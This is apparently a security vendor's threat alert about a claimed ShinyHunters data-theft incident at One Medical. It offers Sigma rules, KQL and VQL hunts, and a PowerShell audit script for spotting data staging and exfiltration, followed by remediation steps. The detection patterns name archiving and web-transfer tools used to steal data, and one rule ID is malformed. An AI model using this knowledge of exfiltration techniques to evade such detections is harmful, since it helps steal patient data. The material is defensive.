The healthcare sector is once again under siege following the announcement that ShinyHunters, a notorious data extortion group, claims to have accessed approximately 8.8 TB of sensitive data from One Medical, an Amazon-owned primary care provider. This incident underscores a grim reality in 2026: threat actors are not just encrypting data; they are siphoning terabytes of PHI (Protected Health Information) for leverage.
For defenders, the magnitude of 8.8 TB is a critical indicator. This volume of data suggests a prolonged dwell time or a high-bandwidth exfiltration channel, likely bypassing standard Data Loss Prevention (DLP) controls. Security teams must assume that perimeter defenses were insufficient and pivot to detecting the behaviors associated with data staging and large-scale egress.
Technical Analysis
While the specific initial access vector (IAV) is under investigation, ShinyHunters historically leverages credential theft, misconfigured cloud storage buckets, or third-party supply chain vulnerabilities to gain a foothold.
Threat Actor Profile: ShinyHunters is an extortion-focused group known for breaching organizations and threatening to leak data unless a ransom is paid. Unlike traditional ransomware operators who prioritize encryption for operational disruption, ShinyHunters focuses on the theft of sensitive intellectual property and PII/PHI.
Attack Chain & Observable Behaviors:
- Initial Access: Likely via compromised credentials or web application vulnerabilities (no specific CVE has been disclosed in this alert).
- Discovery & Staging: The sheer volume (8.8 TB) implies the attacker spent significant time mapping the network and aggregating files. We expect to see the creation of large archives (ZIP, RAR, 7z) or the use of
rclone/AzCopyfor cloud synchronization. - Exfiltration: Moving 8.8 TB requires substantial bandwidth. Defenders should look for anomalous spikes in outbound traffic, specifically to non-corporate IP addresses or known cloud storage endpoints used without MFA.
Affected Assets: While One Medical is the confirmed victim, any healthcare provider leveraging cloud-based primary care platforms or extensive electronic health records (EHR) databases is a potential target.
Detection & Response
To identify active exfiltration or staging similar to the One Medical incident, deploy the following detection logic.
SIGMA Rules
---
title: Potential Large Scale Data Staging via Archiving Tools
id: 8a4b2c91-1d3e-4f5a-9b6c-7d8e9f0a1b2c
status: experimental
description: Detects the use of high-compression archiving tools often used to stage large volumes of data for exfiltration, relevant to incidents involving terabytes of stolen data.
references:
- https://attack.mitre.org/techniques/T1560/
author: Security Arsenal
date: 2026/04/06
tags:
- attack.collection
- attack.t1560.001
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\winrar.exe'
- '\7z.exe'
- '\winzip.exe'
- '\tar.exe'
CommandLine|contains:
- '-m0'
- '-mx9'
- '-hp'
condition: selection
falsepositives:
- Legitimate system backups by administrators
level: high
---
title: Suspicious PowerShell Web Request with Large Data Transfer
id: 9b5c3d02-2e4f-5g6a-0c7d-1e2f3a4b5c6d
status: experimental
description: Detects PowerShell commands utilizing Invoke-WebRequest or similar methods to transfer data, often used in exfiltration scripts.
references:
- https://attack.mitre.org/techniques/T1105/
author: Security Arsenal
date: 2026/04/06
tags:
- attack.exfiltration
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
selection_cli:
CommandLine|contains:
- 'Invoke-WebRequest'
- 'IWR'
- 'Invoke-RestMethod'
- 'IRM'
- 'OutFile'
filter:
CommandLine|contains:
- 'githubusercontent.com'
- 'microsoft.com'
condition: selection_img and selection_cli and not filter
falsepositives:
- Systems management tools
- Software update scripts
level: medium
KQL (Microsoft Sentinel / Defender)
// Hunt for high volume outbound network connections indicative of exfiltration
DeviceNetworkEvents
| where Timestamp > ago(1d)
| where SentBytes > 50000000 // Threshold: 50MB+
| summarize TotalBytesSent=sum(SentBytes), Count=count() by DeviceName, RemoteIP, RemoteUrl, InitiatingProcessFileName
| where TotalBytesSent > 1000000000 // Threshold: 1GB+
| project DeviceName, RemoteUrl, InitiatingProcessFileName, TotalBytesSent, Count
| top 20 by TotalBytesSent desc
// Look for creation of compressed archives in user directories
DeviceFileEvents
| where Timestamp > ago(3d)
| where ActionType == "FileCreated"
| where FileName endswith ".zip" or FileName endswith ".rar" or FileName endswith ".7z"
| where FolderPath contains "Users"
| extend SizeMB = round(AdditionalFields.FileSize / 1024 / 1024, 2)
| where SizeMB > 100 // Greater than 100MB
| project Timestamp, DeviceName, InitiatingProcessAccountName, FileName, FolderPath, SizeMB
Velociraptor VQL
-- Hunt for recently modified large files that could be staging archives
SELECT FullPath, Size, Mtime, Mode
FROM glob(globs='C:/Users/**/*.zip', globs='C:/Users/**/*.rar', globs='C:/Users/**/*.7z')
WHERE Mtime > now() - 24h
AND Size > 50000000
ORDER BY Size DESC
Remediation Script
# Audit Script: Identify Large Archives and Open Network Connections
# Usage: Run as Administrator on suspected endpoints
Write-Host "[*] Scanning for large archives in User Profiles..."
$largeFiles = Get-ChildItem -Path "C:\Users" -Recurse -Include *.zip,*.rar,*.7z -ErrorAction SilentlyContinue |
Where-Object { $_.Length -gt 500MB -and $_.LastWriteTime -gt (Get-Date).AddDays(-2) }
if ($largeFiles) {
Write-Host "[!] ALERT: Found " $largeFiles.Count " suspicious large files." -ForegroundColor Red
$largeFiles | Select-Object FullName, Length, LastWriteTime
} else {
Write-Host "[+] No large suspicious archives found." -ForegroundColor Green
}
Write-Host "[*] Checking for established non-standard outbound connections..."
$netstat = netstat -ano | Select-String "ESTABLISHED"
$suspiciousPorts = $netstat | Where-Object { $_ -match ":(443|80)$" -eq $false } # Filter common web traffic to reduce noise
if ($suspiciousPorts) {
Write-Host "[!] Active connections on non-standard ports detected:" -ForegroundColor Yellow
$suspiciousPorts
}
Remediation
Given the nature of this threat (Data Extortion), immediate containment is paramount to prevent further leakage.
-
Identity Compromise Assessment: Assume credentials are compromised. Force a password reset for all accounts with access to the sensitive EHR/PHI databases. Enforce MFA (Multi-Factor Authentication) immediately for all administrative and user access, particularly for cloud portals.
-
Cloud Storage Audit: ShinyHunters frequently targets cloud storage. Audit AWS S3 buckets, Azure Blobs, or similar storage for:
- Publicly accessible ("public-read") settings.
- Misconfigured IAM policies allowing "List" and "Get" actions to anonymous or external principals.
-
Network Egress Controls: Implement strict firewall rules to block unauthorized outbound traffic. Whitelist only necessary IP addresses for data transmission. Inspect SSL/TLS traffic (DPI) to identify exfiltration attempts over encrypted channels.
-
Investigate Third-Party Access: Review access logs for third-party vendors or supply chain partners, as these are common vectors for groups like ShinyHunters.
Related Resources
Security Arsenal Healthcare Cybersecurity AlertMonitor Platform Book a SOC Assessment healthcare Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.